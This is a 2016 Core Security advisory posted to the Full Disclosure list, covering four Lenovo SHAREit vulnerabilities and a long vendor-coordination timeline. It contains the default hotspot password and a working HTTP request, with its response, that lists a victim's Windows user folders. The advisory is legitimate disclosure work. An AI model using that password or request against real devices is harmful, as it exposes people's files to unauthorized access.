[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[FD] [CORE-2016-0002] - Lenovo ShareIT Multiple Vulnerabilities
- To: <fulldisclosure@xxxxxxxxxxxx>, <bugtraq@xxxxxxxxxxxxxxxxx>
- Subject: [FD] [CORE-2016-0002] - Lenovo ShareIT Multiple Vulnerabilities
- From: CORE Advisories Team <advisories@xxxxxxxxxxxxxxxx>
- Date: Mon, 25 Jan 2016 14:12:56 -0300
1. Advisory Information
Title: Lenovo ShareIT Multiple Vulnerabilities
Advisory ID: CORE-2016-0002
Advisory URL:
http://www.coresecurity.com/advisories/lenovo-shareit-multiple-vulnerabilities
Date published: 2016-01-25
Date of last update: 2016-01-22
Vendors contacted: Lenovo
Release mode: Coordinated release
2. Vulnerability Information
Class: Use of Hard-coded Password [CWE-259], Information Exposure [CWE-200],
Missing Encryption of Sensitive Data [CWE-311], Missing Authorization [CWE-862]
Impact: Security bypass, Information leak
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2016-1491, CVE-2016-1490, CVE-2016-1489, CVE-2016-1492
3. Vulnerability Description
SHAREit [1] is a free application from Lenovo [2] that lets you easily share
files and folders among smartphones, tablets, and personal computers.
Lenovo SHAREit for Windows and Android are prone to multiple vulnerabilities
which could result in integrity corruption, information leak and security
bypasses.
4. Vulnerable Packages
Lenovo SHAREit for Android 3.0.18_ww
Lenovo SHAREit for Windows 2.5.1.1
Other products and versions may also be affected, but they were not tested.
5. Vendor Information, Solutions and Workarounds
Lenovo released an updated version of Lenovo SHAREit for Windows and Android
that fix the reported issues.
The new version of the products can be found here [1].
6. Credits
This vulnerability was discovered and researched by Ivan Huertas from Core
Security Consulting Team. The publication of this advisory was coordinated by
Joaquín Rodríguez Varela from Core Security Advisories Team.
7. Technical Description / Proof of Concept Code
7.1. Hard-coded password in Lenovo SHAREit for Windows
[CVE-2016-1491] When Lenovo SHAREit for Windows is configured to receive files,
a Wifi HotSpot is set with an easy password (12345678). Any system with a Wifi
Network card could connect to that Hotspot by using that password. The password
is always the same.
7.2. Remote browsing of file system on Lenovo SHAREit for Windows
[CVE-2016-1490] When the WiFi network is on and connected with the default
password (12345678), the files can be browsed but not downloaded by performing
an HTTP Request to the WebServer launched by Lenovo SHAREit. The following
request was used to perform this action:
POST /list?type=file&path=C%3A%5CUsers\admin HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; XT1032 Build/KXB21.14-L1.40)
Host: 192.168.173.1:2999
Connection: Keep-Alivek
Accept-Encoding: gzip
Content-Length: 0
HTTP/1.0 200 OK
Content-Length: 2426
{"containers":[{"filepath":"C:\\Users\\admin\\Contacts","has_thumbnail":false,"id":"C:\\Users\\admin\\Contacts","isloaded":false,"isroot":false,"isvolume":false,"name":"Contacts","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Desktop","has_thumbnail":false,"id":"C:\\Users\\admin\\Desktop","isloaded":false,"isroot":false,"isvolume":false,"name":"Desktop","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Documents","has_thumbnail":false,"id":"C:\\Users\\admin\\Documents","isloaded":false,"isroot":false,"isvolume":false,"name":"Documents","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Downloads","has_thumbnail":false,"id":"C:\\Users\\admin\\Downloads","isloaded":false,"isroot":false,"isvolume":false,"name":"Downloads","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Favorites","has_thumbnail":false,"id":"C:\\Users\\admin\\Favorites","isloaded":false,"isroot":false,"isvolume":false,"name":"Favorites","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Links",
"has_thumbnail":false,"id":"C:\\Users\\admin\\Links","isloaded":false,"isroot":false,"isvolume":false,"name":"Links","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Music","has_thumbnail":false,"id":"C:\\Users\\admin\\Music","isloaded":false,"isroot":false,"isvolume":false,"name":"My
Music","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Pictures","has_thumbnail":false,"id":"C:\\Users\\admin\\Pictures","isloaded":false,"isroot":false,"isvolume":false,"name":"My
Pictures","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Saved
Games","has_thumbnail":false,"id":"C:\\Users\\admin\\Saved
Games","isloaded":false,"isroot":false,"isvolume":false,"name":"Saved
Games","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Searches","has_thumbnail":false,"id":"C:\\Users\\admin\\Searches","isloaded":false,"isroot":false,"isvolume":false,"name":"Searches","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Tracing","has_thumbnail":false,"id":"C:\\Users\\admin\\Tracing","isloaded":false,"isroot":false,"isvolume":false,"name":"Tracing","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Videos","has_thumbnail":false,"id":"C:\\Users\\admin\\Videos","isloaded":false,"isroot":false,"isvolume":false,"name":"My
","type":"file","ver":""}],"filepath":"C:\\Users\\admin","has_thumbnail":false,"id":"C:\\Users\\admin","isloaded":true,"isroot":false,"isvolume":false,"name":"admin","type":"file","ver":""}
7.3. Files transferred in plain text in Windows and Android version of Lenovo
SHAREit
[CVE-2016-1489] The files are transfered via HTTP without encryption. An
attacker that is able to sniff the network traffic could to view the data
transferred or perform man in the middle attacks, for example by modifying the
content of the transferred files.
7.4. Open WiFi Network defined on Android devices
[CVE-2016-1492] When the application is configured to receive files, an open
Wifi HotSpot is created without any password. An attacker could connect to that
HotSpot and capture the information transferred between those devices.
8. Report Timeline
2015-10-29: Core Security sent an initial notification to Lenovo.
2015-10-29: Lenovo replied attaching their public PGP key.
2015-10-29: Core Security sent Lenovo a draft version of the advisory and
requested a tentative day for the release of the patched version.
2015-10-29: Lenovo replied their development team would review Core Security
findings.
2015-11-06: Lenovo informed that they would like to discuss their progress in a
telephone meeting.
2015-11-06: Core Security replied Lenovo that is our policy not to have such
communications in order to always keep a log of all interactions with the
vendor.
2015-11-06: Lenovo replied they understood Core Security policy and asked if
the first disclosure date was negotiable.
2015-11-06: Core Security replied Lenovo that the date was negotiable, being
the priority to make a coordinated release.
2015-11-13: Lenovo informed Core Security they had addressed the Windows
version issues and could share a beta fix for us to validate. They informed as
well that the development team would continue to investigate the Android
version issues.
2015-11-20: Lenovo asked Core Security for feedback regarding their beta fix.
2015-11-20: Core Security replied saying there was a small delay in the review
of the beta fix and informed Lenovo they would send a reply next week.
2015-11-20: Lenovo asked Core Security to confirm that the publication date of
the advisory was not going to be on November 30, and asked to seek an agreement
regarding a specific date.
2015-11-23: Core Security replied stating that they were not going to publish
their findings on November 30, and the idea was to coordinate a schedule
according to the release date of the corrected versions. Additionally, Core
Security informed Lenovo regarding the beta fix, which was still using the
hardcoded password.
2015-11-23: Lenovo informed Core Security that they had forwarded Core's
analysis to their development team.
2015-11-25: Lenovo informed Core Security that they considered that issue as
resolved considering that the hardcoded password was not present in the "secure
mode" and only used in the "easy mode".
2015-12-06: Lenovo informed Core Security that they were still working on the
schedule.
2015-12-07: Lenovo informed Core Security that they were targeting to release
the updated Windows version on January 10 and that they would continue working
with their third party partner for the Android version release.
2016-01-04: Core Security asked Lenovo if the publication date could be moved
from Sunday 10 to Monday 11 of January.
2016-01-04: Lenovo asked Core Security for more specific justifications for not
releasing on a Sunday.
2016-01-05: Core Security informed Lenovo that is always recommend to publish
on a working day in order to give enough time to the affected users to update
their products (particularly corporate users) and avoid explotations of the
published flaws by malicious users on the weekend.
2016-01-05: Lenovo informed Core Security that they agreed to publish on Monday
11 but that they hadn't planned a date for their advisory disclosure.
2016-01-05: Core Security informed Lenovo that our advisory would be published
the same day as the release of the new version.
2015-01-05: Lenovo informed Core Security that they would publish their
advisory concurrently with Core's advisory. Lenovo requested a draft version of
the advisory in order to ensure consistency among publications. They asked how
Core would like to be acknowledged in their advisory and offered additional
publication dates in case they couldn't meet the Monday 11 deadline.
2016-01-05: Core Security informed Lenovo that the additional publication dates
ares acceptable if Core is informed with time of such changes. We informed that
we would send them a draft of the advisory once it was completed and sent them
the acknowledgment line as requested.
2016-01-06: Core Security sent Lenovo the draft version of the advisory.
2016-01-08: Lenovo informed Core Security that due they discovered additional
vulnerabilities they requested to address both platform issues together.
Additionaly thay requested an extension to the publication date to mid-February
and a possibility to keep updating Lenovo SHAREit.
2016-01-08: Core Security informed Lenovo that it was our first request to
address all vulnerabilities in one advisory. Additinally we requested to know
which vulnerabilities they were planning to address, and if those included any
of the reported by us. We expressed our willingness to extend the deadline even
though the maximum 3 months period we define was already over.
2016-01-08: Lenovo informed Core Security that they intend to address al the
reported vulnerabilities by us and requested confimration on extending the date
of our joint disclosure to mid-February
2016-01-08: Core Security informed Lenovo that we wanted to know exactly when
each vulnerability was going to be addressed in advanced in order to agree to
extend the date of our joint disclosure.
2016-01-08: Lenovo informed Core Security that they agreed to our terms.
2016-01-14: Lenovo informed Core Security that they were going to publish the
new versions for both platforms addressing all the reported vulnerabilities on
January 15 and expected to release the joint disclosure on mid-February.
2016-01-14: Core Security informed Lenovo that is our policy to disclose our
findings once the new version correcting the issues becomes available. We
informed them that if that was going to happen the following day, we would be
forced to publish our security advisory the following day as well.
2016-01-15: Lenovo informed Core Security that they misunderstood our
disclosure policy. They informed us that they would probably be publishing the
following week and no later than January 22.
2016-01-15: Core Security informed Lenovo that we commited to a joint security
disclosure the day the software releases went live and requested an advanced
notice as soon as they could.
2016-01-19: Lenovo informed Core Security that they agreed to our request.
2016-01-20: Core Security informed Lenovo that they would be publishing both
versions on Friday 22 of January.
2016-01-20: Core Security requested Lenovo to release the updates on Monday 25
of January as it was recommended before in order to give the affected users
enough working days to download and install the new version.
2016-01-21: Lenovo informed Core Security that they agreed to release on
Monday, January 25. They also informed that they would be publishing their
security advisory as well.
2016-01-25: Advisory CORE-2016-0002 published.
9. References
[1] http://shareit.lenovo.com/#DOWNLOAD.
[2] http://www.lenovo.com.
10. About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating
the future needs and requirements for information security technologies. We
conduct our research in several important areas of computer security including
system vulnerabilities, cyber attack planning and simulation, source code
auditing, and cryptography. Our results include problem formalization,
identification of vulnerabilities, novel solutions and prototypes for new
technologies. CoreLabs regularly publishes security advisories, technical
papers, project information and shared software tools for public use at:
http://corelabs.coresecurity.com.
11. About Core Security Technologies
Core Security Technologies enables organizations to get ahead of threats with
security test and measurement solutions that continuously identify and
demonstrate real-world exposures to their most critical assets. Our customers
can gain real visibility into their security standing, real validation of their
security controls, and real metrics to more effectively secure their
organizations.
Core Security's software solutions build on over a decade of trusted research
and leading-edge threat expertise from the company's Security Consulting
Services, CoreLabs and Engineering groups. Core Security Technologies can be
reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.
12. Disclaimer
The contents of this advisory are copyright (c) 2015 Core Security and (c) 2015
CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial
Share-Alike 3.0 (United States) License:
http://creativecommons.org/licenses/by-nc-sa/3.0/us/
13. PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security advisories
team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/